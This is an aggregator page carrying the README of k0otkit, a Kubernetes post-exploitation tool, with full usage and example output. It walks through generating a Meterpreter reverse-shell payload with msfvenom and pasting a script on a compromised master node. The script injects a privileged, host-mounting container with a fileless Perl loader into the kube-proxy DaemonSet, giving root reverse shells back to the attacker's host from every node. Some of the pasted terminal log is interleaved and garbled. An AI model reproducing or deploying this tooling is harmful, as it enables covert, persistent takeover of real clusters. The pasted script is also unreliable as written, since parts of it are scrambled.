All Projects → Metarget → k0otkit

Metarget / k0otkit

Licence: other
k0otkit is a universal post-penetration technique which could be used in penetrations against Kubernetes clusters.

Programming Languages

shell
77523 projects

Projects that are alternatives of or similar to k0otkit

awesome-cloud-native-security
awesome resources about cloud native security 🐿
Stars: ✭ 233 (+7.37%)
Mutual labels:  container-security, kubernetes-security, container-escape
k8s-metadata-injection
Kubernetes metadata injection for New Relic APM to make a linkage between APM and Infrastructure data.
Stars: ✭ 19 (-91.24%)
Mutual labels:  k8s
Helm-Cheat-Sheet
A cheat sheet for Helm commands.
Stars: ✭ 72 (-66.82%)
Mutual labels:  k8s
paas-templates
Bosh, CFAR, CFCR and OSB services templates for use with COA (cf-ops-automation) framework
Stars: ✭ 16 (-92.63%)
Mutual labels:  k8s
libvirt-ocp4-provisioner
Automate your OCP4 installation
Stars: ✭ 82 (-62.21%)
Mutual labels:  k8s
micro-service-practice
OpenStack+Docker+RestAPI+OAuth/HMAC+RabbitMQ/ZMQ+OpenResty/HAProxy/Nginx/APIGateway+Bootstrap/AngularJS+Ansible+K8S/Mesos/Marathon构建/探索微服务最佳实践。
Stars: ✭ 25 (-88.48%)
Mutual labels:  k8s
rs
Reverse shell auto generator used for Hackthebox/OSCP/Pentest/LABExp
Stars: ✭ 37 (-82.95%)
Mutual labels:  reverse-shell
fury-kubernetes-opa
Kubernetes Fury OPA. Policy enforcement for your Kubernetes Cluster
Stars: ✭ 34 (-84.33%)
Mutual labels:  k8s
trolo
trolo - an easy to use script for generating Payloads that bypasses antivirus
Stars: ✭ 45 (-79.26%)
Mutual labels:  reverse-shell
docker-alpine-sshd
A lightweight OpenSSH Docker Image built atop Alpine Linux.
Stars: ✭ 108 (-50.23%)
Mutual labels:  k8s
kube-install
一鍵安裝部署高可用的多kubernetes集羣(二進位離線方式),支持定時安裝、添加與銷毀node、銷毀與修復master、一鍵卸載集羣等。One click offline installation of highly available multiple kubernetes cluster, supports schedule installation, addition of nodes, rebuild of kubernetes master, and uninstallation of clusters.
Stars: ✭ 336 (+54.84%)
Mutual labels:  k8s
k3s-vagrant
k3s k8s cluster playground
Stars: ✭ 39 (-82.03%)
Mutual labels:  k8s
github-task-manager
receive github hook, notify agent, receive task results, notify github
Stars: ✭ 13 (-94.01%)
Mutual labels:  k8s
charts
Helm charts for creating reproducible and maintainable deployments of Polyaxon with Kubernetes.
Stars: ✭ 32 (-85.25%)
Mutual labels:  k8s
kube-exec-controller
An admission controller service and kubectl plugin to handle container drift in K8s clusters
Stars: ✭ 70 (-67.74%)
Mutual labels:  k8s
aegir
Validation Webhook for Kubernetes based on LIVR rules (https://livr-spec.org)
Stars: ✭ 50 (-76.96%)
Mutual labels:  k8s
kahoy
Simple Kubernetes raw manifests deployment tool
Stars: ✭ 33 (-84.79%)
Mutual labels:  k8s
eks-deep-dive-2019
Amazon EKS Deep Dive 2019
Stars: ✭ 61 (-71.89%)
Mutual labels:  k8s
boot2podman
Lightweight Linux for Podman
Stars: ✭ 86 (-60.37%)
Mutual labels:  k8s
Lecture k8s starter.kit
'쉽게 시작하는 쿠버네티스' 온라인 강의
Stars: ✭ 58 (-73.27%)
Mutual labels:  k8s

k0otkit - Manipulate K8s in a K8s way

Introduction

k0otkit is a universal post-penetration technique which could be used in penetrations against Kubernetes clusters.

With k0otkit, you can manipulate all the nodes in the target Kubernetes cluster in a rapid, covert and continuous way (reverse shell).

k0otkit is the combination of Kubernetes and rootkit.

Prerequisite:

k0otkit is a post-penetration tool, so you have to firstly conquer a cluster, somehow manage to escape from the container and get the root privilege of the master node (to be exact, you should get the admin privilege of the target Kubernetes).

Scenario:

  1. After Web penetration, you get a shell of the target.
  2. If necessary, you manage to escalate the privilege and make it.
  3. You find the target environment is a container (Pod) in a Kubernetes cluster.
  4. You manage to escape from the container and make it (with CVE-2016-5195, CVE-2019-5736, docker.sock or other techniques).
  5. You get a root shell of the master node and are able to instruct the cluster with kubectl on the master node as admin.
  6. Now you want to control all the nodes in the cluster as quickly as possible. Here comes k0otkit!

k0otkit is detailed in k0otkit: Hack K8s in a K8s Way.

Usage

Make sure you have got the root shell on the master node of the target Kubernetes. (You can also utilize k0otkit if you have the admin privilege of the target Kubernetes, though you might need to modify the kubectl command in k0otkit_template.sh to use the token or certification.)

Make sure you have installed Metasploit on your attacker host (msfvenom and msfconsole should be available).

Deploy k0otkit

Clone this repository:

git clone https://github.com/brant-ruan/k0otkit
cd k0otkit/
chmod +x ./*.sh

Replace the attacker's IP and port in pre_exp.sh with your own IP and port:

ATTACKER_IP=192.168.1.107
ATTACKER_PORT=4444

Generate k0otkit:

./pre_exp.sh

k0otkit.sh will be generated. Then run the reverse shell handler:

./handle_multi_reverse_shell.sh

Once the handler is ready, copy the content of k0otkit.sh and paste it into your shell on the master node of the target Kubernetes, then press <Enter> to execute it.

Wait a moment and enjoy reverse shells from all nodes :)

P.S. It is not limited how many Kubernetes clusters you manipulate with k0otkit.

Interact with Shells

After the successful deployment of k0otkit, you can interact with any reverse shell as you want:

# within msfconsole
sessions 1

Features

  • utilize K8s resources and features (hack K8s in a K8s way)
  • dynamic container injection
  • communication encryption (thanks to Meterpreter)
  • fileless

Example

Generate k0otkit:

kali@kali:~/k0otkit$ ./pre_exp.sh
+ ATTACKER_IP=192.168.1.107
+ ATTACKER_PORT=4444
+ TEMP_MRT=mrt
+ msfvenom -p linux/x86/meterpreter/reverse_tcp LPORT=4444 LHOST=192.168.1.107 -f elf -o mrt
++ xxd -p mrt
++ tr -d '\n'
++ base64 -w 0
+ PAYLOAD=N2Y0NTRjNDYwMTAxMDEwMDAwMDAwMDAwMDAwMDAwMDAwMjAwMDMwMDAxMDAwMDAwNTQ4MDA0MDgzNDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAzNDAwMjAwMDAxMDAwMDAwMDAwMDAwMDAwMTAwMDAwMDAwMDAwMDAwMDA4MDA0MDgwMDgwMDQwOGNmMDAwMDAwNGEwMTAwMDAwNzAwMDAwMDAwMTAwMDAwNmEwYTVlMzFkYmY3ZTM1MzQzNTM2YTAyYjA2Njg5ZTFjZDgwOTc1YjY4YzBhODEzZjM2ODAyMDAxMTVjODllMTZhNjY1ODUwNTE1Nzg5ZTE0M2NkODA4NWMwNzkxOTRlNzQzZDY4YTIwMDAwMDA1ODZhMDA2YTA1ODllMzMxYzljZDgwODVjMDc5YmRlYjI3YjIwN2I5MDAxMDAwMDA4OWUzYzFlYjBjYzFlMzBjYjA3ZGNkODA4NWMwNzgxMDViODllMTk5YjI2YWIwMDNjZDgwODVjMDc4MDJmZmUxYjgwMTAwMDAwMGJiMDEwMDAwMDBjZDgw
+ sed s/PAYLOAD_VALUE_BASE64/N2Y0NTRjNDYwMTAxMDEwMDAwMDAwMDAwMDAwMDAwMDAwMjAwMDMwMDAxMDAwMDAwNTQ4MDA0MDgzNDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAzNDAwMjAwMDAxMDAwMDAwMDAwMDAwMDAwMTAwMDAwMDAwMDAwMDAwMDA4MDA0MDgwMDgwMDQwOGNmMDAwMDAwNGEwMTAwMDAwNzAwMDAwMDAwMTAwMDAwNmEwYTVlMzFkYmY3ZTM1MzQzNTM2YTAyYjA2Njg5ZTFjZDgwOTc1YjY4YzBhODEzZjM2ODAyMDAxMTVjODllMTZhNjY1ODUwNTE1Nzg5ZTE0M2NkODA4NWMwNzkxOTRlNzQzZDY4YTIwMDAwMDA1ODZhMDA2YTA1ODllMzMxYzljZDgwODVjMDc5YmRlYjI3YjIwN2I5MDAxMDAwMDA4OWUzYzFlYjBjYzFlMzBjYjA3ZGNkODA4NWMwNzgxMDViODllMTk5YjI2YWIwMDNjZDgwODVjMDc4MDJmZmUxYjgwMTAwMDAwMGJiMDEwMDAwMDBjZDgw/g k0otkit_template.sh

Run the reverse shell handler:

kali@kali:~/k0otkit$ ./handle_multi_reverse_shell.sh
payload => linux/x86/meterpreter/reverse_tcp
LHOST => 0.0.0.0
LPORT => 4444
ExitOnSession => false
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.

[*] Started reverse TCP handler on 0.0.0.0:4444
msf5 exploit(multi/handler) >

Copy the content of k0otkit.sh into your shell on the master node of the target Kubernetes and press <Enter>:

kali@kali:~$ nc -lvnp 10000
listening on [any] 10000 ...
connect to [192.168.1.107] from (UNKNOWN) [192.168.1.106] 48750
root@victim-2:~# volume_name=cache

mount_path=/var/kube-proxy-cache

ctr_name=kube-proxy-cache

binary_file=/usr/local/bin/kube-proxy-cache

payload_name=cache

secret_name=proxy-cache

secret_data_name=content

ctr_line_num=$(kubectl --kubeconfig /root/.kube/config -n kube-system get daemonsets kube-proxy -o yaml | awk '/ containers:/{print NR}')

volume_line_num=$(kubectl --kubeconfig /root/.kube/config -n kube-system get daemonsets kube-proxy -o yaml | awk '/ volumes:/{print NR}')

image=$(kubectl --kubeconfig /root/.kube/config -n kube-system get daemonsets kube-proxy -o yaml | grep " image:" | awk '{print $2}')

# create payload secret
cat << EOF | kubectl --kubeconfig /root/.kube/config apply -f -
apiVersion: v1
kind: Secret
metadata:
  name: $secret_name
  namespace:volume_name=cache
root@victim-2:~#
root@victim-2:~# mount_path=/var/kube-p kube-system
type: Opaque
data:
  $secret_data_name: N2Y0NTRjNDYwMTAxMDEwMDAwMDAwMDAwMDAwMDAwMDAwMjAwMDMwMDAxMDAwMDAwNTQ4MDA0MDgzNDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAzNDAwMjAwMDAxMDAwMDAwMDAwMDAwMDAwMTAwMDAwMDAwMDAwMDAwMDA4MDA0MDgwMDgwMDQwOGNmMDAwMDAwNGEwMTAwMDAwNzAwMDAwMDAwMTAwMDAwNmEwYTVlMzFkYmY3ZTM1MzQzNTM2YTAyYjA2Njg5ZTFjZDgwOTc1YjY4YzBhODEzZjM2ODAyMDAxMTVjODllMTZhNjY1ODUwNTE1Nzg5ZTE0M2NkODA4NWMwNzkxOTRlNzQzZDY4YTIwMDAwMDA1ODZhMDA2YTA1ODllMzMxYzljZDgwODVjMDc5YmRlYjI3YjIwN2I5MDAxMDAwMDA4OWUzYzFlYjBjYzFlMzBjYjA3ZGNkODA4NWMwNzgxMDViODllMTk5YjI2YWIwMDNjZDgwODVjMDc4MDJmZmUxYjgwMTAwMDAwMGJiMDEwMDAwMDBjZDgw
EOF

# assume that ctr_line_num < volume_line_num
# otherwise you should switch the two sed commands below

# inject malicious container into kube-proxy pod
kubecroxy-cache
root@victim-2:~#
root@victim-2:~# ctr_name=kube-proxy-cache
root@victim-2:~#
root@victim-2:~# binary_file=/usr/local/bin/kube-proxy-cache
root@victim-2:~#
root@victim-2:~# payload_name=cache
root@victim-2:~#
root@victim-2:~# secret_name=proxy-cache
root@victim-2:~#
root@victim-2:~# secret_data_name=content
root@victim-2:~#
root@victim-2:~# ctr_line_num=$(kubectl --kubeconfig /root/.kube/config -n kube-system get daemonsets kube-tl --kubeconfig /root/.kube/config -n kube-system get daemonsets kube-proxy -o yaml \
  | sed "$volume_line_num a\ \ \ \ \ \ - name: $volume_name\n        hostPath:\n          path: /\n          type: Directory\n" \
  | sed "$ctr_line_num a\ \ \ \ \ \ - name: $ctr_name\n        image: $image\n        imagePullPolicy: IfNotPresent\n        command: [\"sh\"]\n        args: [\"-c\", \"echo \$$payload_name | perl -e 'my \$n=qq(); my \$fd=syscall(319, \$n, 1); open(\$FH, qq(>&=).\$fd); select((select(\$FH), \$|=1)[0]); print \$FH pack q/H*/, <STDIN>; my \$pid = fork(); if (0 != \$pid) { wait }; if (0 == \$pid){system(qq(/proc/\$\$\$\$/fd/\$fd))}'\"]\n        env:\n          - name: $payload_name\n            valueFrom:\n              secretKeyRef:\n          pr      name: $secret_name\n                key: $secret_data_name\n        securityContext:\n          privileged: true\n        volumeMounts:\n        - mountPath: $mount_path\n          name: $volume_name" \
containers:/{print NR}')oxy -o yaml | awk '/

root@victim-2:~#
root@victim-2:~# volume_line_num=$(kubectl --kubeconfig /root/.kube/config -n kube-system get daemonsets kube-proxy -o yaml | awk '/ volumes:/{print NR}')
root@victim-2:~#
root@victim-2:~# image=$(kubectl --kubeconfig /root/.kube/config -n kube-system get daemonsets kube-proxy -o yaml | grep " image:" | awk '{print $2}')
root@victim-2:~#
root@victim-2:~# # create payload secret
root@victim-2:~# cat << EOF | kubectl --kubeconfig /root/.kube/config apply -f -
> apiVersion: v1
> kind: Secret
> metadata:
>   name: $secret_name
>   namespace: kube-system
> type: Opaque
> data:
>   $secret_data_name: N2Y0NTRjNDYwMTAxMDEwMDAwMDAwMDAwMDAwMDAwMDAwMjAwMDMwMDAxMDAwMDAwNTQ4MDA0MDgzNDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAzNDAwMjAwMDAxMDAwMDAwMDAwMDAwMDAwMTAwMDAwMDAwMDAwMDAwMDA4MDA0MDgwMDgwMDQwOGNmMDAwMDAwNGEwMTAwMDAwNzAwMDAwMDAwMTAwMDAwNmEwYTVlMzFkYmY3ZTM1MzQzNTM2YTAyYjA2Njg5ZTFjZDgwOTc1YjY4YzBhODEzZjM2ODAyMDAxMTVjODllMTZhNjY1ODUwNTE1Nzg5ZTE0M2NkODA4NWMwNzkxOTRlNzQzZDY4YTIwMDAwMDA1ODZhMDA2YTA1ODllMzMxYzljZDgwODVjMDc5YmRlYjI3YjIwN2I5MDAxMDAwMDA4OWUzYzFlYjBjYzFlMzBjYjA3ZGNkODA4NWMwNzgxMDViODllMTk5YjI2YWIwMDNjZDgwODVjMDc4MDJmZmUxYjgwMTAwMDAwMGJiMDEwMDAwMDBjZDgw
> EOF
secret/proxy-cache created
root@victim-2:~#
root@victim-2:~# # assume that ctr_line_num < volume_line_num
root@victim-2:~# # otherwise you should switch the two sed commands below
root@victim-2:~#
root@victim-2:~# # inject malicious container into kube-proxy pod
root@victim-2:~# kubectl --kubeconfig /root/.kube/config -n kube-system get daemonsets kube-proxy -o yaml \
>   | sed "$volume_line_num a\ \ \ \ \ \ - name: $volume_name\n        hostPath:\n          path: /\n          type: Directory\n" \
>   | sed "$ctr_line_num a\ \ \ \ \ \ - name: $ctr_name\n        image: $image\n        imagePullPolicy: IfNotPresent\n        command: [\"sh\"]\n        args: [\"-c\", \"echo \$$payload_name | perl -e 'my \$n=qq(); my \$fd=syscall(319, \$n, 1); open(\$FH, qq(>&=).\$fd); select((select(\$FH), \$|=1)[0]); print \$FH pack q/H*/, <STDIN>; my \$pid = fork(); if (0 != \$pid) { wait }; if (0 == \$pid){system(qq(/proc/\$\$\$\$/fd/\$fd))}'\"]\n        env:\n          - name: $payload_name\n            valueFrom:\n              secretKeyRef:\n                name: $secret_name\n                key: $secret_data_name\n        securityContext:\n          privileged: true\n        volumeMounts:\n        - mountPath: $mount_path\n          name: $volume_name" \
>   | kubectl replace -f -
daemonset.extensions/kube-proxy replaced

Wait for reverse shells:

msf5 exploit(multi/handler) > [*] Sending stage (985320 bytes) to 192.168.1.106
[*] Meterpreter session 1 opened (192.168.1.107:4444 -> 192.168.1.106:51610) at 2020-11-30 03:30:18 -0500

msf5 exploit(multi/handler) > sessions

Active sessions
===============

  Id  Name  Type                   Information                                    Connection
  --  ----  ----                   -----------                                    ----------
  1         meterpreter x86/linux  uid=0, gid=0, euid=0, egid=0 @ 192.168.1.106  192.168.1.107:4444 -> 192.168.1.106:51610 (192.168.1.106)

Function 1 Exit & Re-connect:

msf5 exploit(multi/handler) > sessions 1
[*] Starting interaction with 1...

meterpreter > shell
Process 9 created.
Channel 1 created.
whoami
root
exit
meterpreter > exit
[*] Shutting down Meterpreter...

[*] 192.168.1.106 - Meterpreter session 1 closed.  Reason: User exit
msf5 exploit(multi/handler) >
[*] Sending stage (985320 bytes) to 192.168.1.106
[*] Meterpreter session 2 opened (192.168.1.107:4444 -> 192.168.1.106:52292) at 2020-11-30 03:32:25 -0500

Function 2 Escape to & Control Node:

msf5 exploit(multi/handler) > sessions 2
[*] Starting interaction with 2...

meterpreter > cd /var/kube-proxy-cache
meterpreter > ls
Listing: /var/kube-proxy-cache
==============================

Mode              Size      Type  Last modified              Name
----              ----      ----  -------------              ----
40755/rwxr-xr-x   4096      dir   2020-03-03 03:21:08 -0500  bin
40755/rwxr-xr-x   4096      dir   2020-03-05 22:23:56 -0500  boot
40755/rwxr-xr-x   4180      dir   2020-04-09 21:32:10 -0400  dev
40755/rwxr-xr-x   4096      dir   2020-04-17 02:31:15 -0400  etc
40755/rwxr-xr-x   4096      dir   2020-03-03 03:00:00 -0500  home
100644/rw-r--r--  36257923  fil   2020-03-05 22:23:56 -0500  initrd.img
100644/rw-r--r--  39829184  fil   2020-03-03 03:00:17 -0500  initrd.img.old
40755/rwxr-xr-x   4096      dir   2020-04-16 03:52:46 -0400  lib
40755/rwxr-xr-x   4096      dir   2020-03-03 02:33:23 -0500  lib64
40700/rwx------   16384     dir   2020-03-03 02:33:19 -0500  lost+found
40755/rwxr-xr-x   4096      dir   2020-03-03 02:33:29 -0500  media
40755/rwxr-xr-x   4096      dir   2020-03-03 02:33:23 -0500  mnt
40755/rwxr-xr-x   4096      dir   2020-04-16 03:59:01 -0400  opt
40555/r-xr-xr-x   0         dir   2020-04-09 21:32:01 -0400  proc
40700/rwx------   4096      dir   2020-11-30 04:00:05 -0500  root
40755/rwxr-xr-x   1020      dir   2020-11-30 04:04:59 -0500  run
40755/rwxr-xr-x   12288     dir   2020-04-16 03:52:46 -0400  sbin
40755/rwxr-xr-x   4096      dir   2020-03-03 03:02:37 -0500  snap
40755/rwxr-xr-x   4096      dir   2020-03-03 02:33:23 -0500  srv
40555/r-xr-xr-x   0         dir   2020-04-14 22:51:06 -0400  sys
41777/rwxrwxrwx   4096      dir   2020-11-30 04:10:07 -0500  tmp
40755/rwxr-xr-x   4096      dir   2020-04-16 04:42:54 -0400  usr
40755/rwxr-xr-x   4096      dir   2020-03-03 02:51:25 -0500  var
100600/rw-------  6712336   fil   2020-03-05 22:22:58 -0500  vmlinuz
100600/rw-------  7184032   fil   2020-03-03 02:33:55 -0500  vmlinuz.old
Note that the project description data, including the texts, logos, images, and/or trademarks, for each open source project belongs to its rightful owner. If you wish to add or remove any projects, please contact us at [email protected].